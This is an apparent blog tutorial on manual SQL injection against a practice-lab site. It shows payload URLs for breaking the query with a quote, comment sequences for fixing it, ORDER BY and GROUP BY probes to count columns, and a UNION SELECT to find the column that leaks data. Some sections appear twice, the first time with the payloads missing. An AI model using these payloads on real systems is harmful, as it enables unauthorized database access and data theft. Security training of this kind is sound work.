Today We will learn How to Find Number of columns of site and also find which column is vulnerable
Lets Start :::
This is site which is vulnerable :::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1First we put a Single Code ' To check either it is vulnerable or not....
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'
IF it Generates A error Message like That You have SQL syntax Error....It means it is Vulnerable and suitable for SQL injection .....
SO in my case it Generates Error Message :::
As u can See in Picture
------------------------------------------------------------------------------------------------------------------------
~~~Fixing And Balancing A Query:::----
------------------------------------------------------------------------------------------------------------------------------
Fixing a query plays a very important role in sql injection. without fixing error we can not find number of columns and Database informations.
We can fixe A Query by Using Comments like that :
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+
if by Adding --+ error Goes it means our Query is fixed .now WE can use Order by Or group by to find Number of columns and Perform other Tasks...
Some Cheat sheet of Fixing A query .::
-- | : | MySQL Linux Style |
--+ | : | MySQL Windows Style |
# | : | Hash (URL encode while use) |
--+- | : | SQL Comment |
; | : | Null Byte |
` | : | Backtick |
Remember whenever the input is enclosed with single quotes only single quote with input will create error.When input is enlcosed by double quotes a double qoute with input will give error.When Input is not enlcosed with anything single quote and double quote both will give error.--------------------------------------------------------------------------------------------------------------------------
so in my case it is fixed by using --+ ..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' --+As you can see in this picutre Error Gone. Now we can use order by or Group by to find number of columns
In Some cases it is not fix by using --+ then we use Null byte ; or backtick and # .....
In Some CAses we have to remove single code ' and then we put at the end -- only
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 --
----------------------------------------------------------------------------------------------------------------------
Finding Number of columns
--------------------------------------------------------------------------------------------
Ater fixing the query now going to find number of columns::
Now i am going to ask database that have you 1 column like that ::
If it do not Generate Error Message it means it has one column.
Now I am going to ask again have you 2 columns from database..
It does not generate error
no Error ::
Now This time It Gives me A error like that ::
----------------------------------------------------------------------------------------------------------------------
~~PerForMing Same Process With Group by::--
-----------------------------------------------------------------------------------------------------------------------------------------
My favourite is Group by ....
In Group by we can use Mulitple Integers At once like that
no Error ::
But this Time It Generates error ::
It also telling us that it has 3 columns :::
--------------------------------------------------------------------------------------------------------------------
How To Find Vulnerable Columns::
-------------------------------------------------
Rules ::
By using Union Select
By Nullifying Parameters
-------------------------------------------
As we know it has 3 columns...now going to find which column is vulnerable..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+
As you can see in this picutre after nullify the parameter it is showing us 2 ..It means From 1,2,3 ...2 is vulnerable column where we can put our injection and extract some juicy data...
--------------------------------------------------------------------------------------------------------------------
In Next Tutorial We will learn How To Print Name , database , version , user, port ,tables and columns
Author ::(AFghani)
Finding Number of columns
--------------------------------------------------------------------------------------------
Ater fixing the query now going to find number of columns::
Now i am going to ask database that have you 1 column like that ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+
If it do not Generate Error Message it means it has one column.
Now I am going to ask again have you 2 columns from database..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+
It does not generate error
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+
no Error ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+
Now This time It Gives me A error like that ::
Error While Selection process : Unknown column '4' in 'order clause'So it means It has 3 columns Because at order by 4 it is telling us that 4 is unknown.....
----------------------------------------------------------------------------------------------------------------------
~~PerForMing Same Process With Group by::--
-----------------------------------------------------------------------------------------------------------------------------------------
My favourite is Group by ....
In Group by we can use Mulitple Integers At once like that
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1--+No Error ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3--+
no Error ::
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' group by 1,2,3,4,5,6,7,8,9--+
But this Time It Generates error ::
Error While Selection process : Unknown column '4' in 'group statement'
It also telling us that it has 3 columns :::
--------------------------------------------------------------------------------------------------------------------
How To Find Vulnerable Columns::
-------------------------------------------------
Rules ::
By using Union Select
By Nullifying Parameters
-------------------------------------------
As we know it has 3 columns...now going to find which column is vulnerable..
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+
As you can see in this picutre after nullify the parameter it is showing us 2 ..It means From 1,2,3 ...2 is vulnerable column where we can put our injection and extract some juicy data...
--------------------------------------------------------------------------------------------------------------------
In Next Tutorial We will learn How To Print Name , database , version , user, port ,tables and columns
Author ::(AFghani)
No comments:
Post a Comment